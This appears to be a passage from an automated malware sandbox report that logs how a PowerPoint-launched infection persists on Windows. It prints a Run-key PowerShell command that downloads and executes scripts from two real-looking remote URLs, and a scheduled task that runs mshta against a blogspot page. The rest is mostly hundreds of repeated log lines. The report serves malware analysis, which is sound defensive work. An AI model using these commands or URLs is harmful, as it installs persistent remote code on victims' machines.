Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 0000000B.00000002.455091036.0000000002837000.00000004.00000040.sdmp

Persistence and Installation Behavior:

barindex
Creates processes via WMI
Source: C:\Windows\System32\mshta.exe WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Boot Survival:

barindex
Creates an autostart registry key pointing to binary in C:\Windows
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw Jump to behavior
Creates multiple autostart registry keys
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pilodkis Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw Jump to behavior
Creates autostart registry keys with suspicious values (likely registry only malware)
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw pOwersHelL.exe -NoProfile -ExecutionPolicy Bypass -Command i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_8935e3fc07ab4d79aadce07d7856d8a3.txt?dn=kofkefjikdaowkdoaw') -useB);i'E'x(iwr('https://8db3b91a-ea93-419b-b51b-0a69902759c5.usrfiles.com/ugd/8db3b9_408b52dd81ad428db256ba35835b2ee7.txt?dn=asdoawkdajicqujwdi') -useB); Jump to behavior
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\schtasks.exe C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 63 /tn ""kqopaueyu"" /F /tr ""\""MsHtA""\""https://kukadunikkk@kdaoskdokaodkwldld.blogspot.com/p/30.html\"
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run cjoemkurieiw Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pilodkis Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run pilodkis Jump to behavior

Hooking and other Techniques for Hiding and Protection:

barindex
Stores large binary data to the registry
Source: C:\Windows\System32\mshta.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\POWERPNT.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
